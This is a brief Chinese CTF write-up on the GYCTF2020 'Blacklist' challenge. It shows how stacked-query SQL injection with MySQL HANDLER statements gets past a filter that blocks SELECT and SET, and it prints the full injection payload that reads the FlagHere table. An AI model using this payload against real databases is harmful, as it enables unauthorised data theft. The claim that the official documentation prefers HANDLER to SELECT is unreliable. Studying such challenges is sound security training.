Handler注入
用法:HANDLER...OPEN
语句打开一个表,然后用HANDLER...READ
读语句,并且读取不会被其他会话共享,最后用HANDLER...CLOSE
关表
1 | HANDLER tbl_name OPEN [ [AS] alias] |
[GYCTF2020]Blacklist
开局一个框,后面全靠猜
这次禁的比强网杯的那个supersqli还狠
但是;
没有禁,那就查表的结构看看
有FlagHere
和默认查询的words
表,下面是FlagHere
的结构
这次没有放过SET
和SELECT
了,跟之前不一样
那就用这个HANDLER查询试试,相较于select官方也更推荐HANDLER
payload:
1 | 1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;%23 |
针不戳
总结
要学会去官方文档里面查表,英语要过关,翻译要快,懒不得懒不得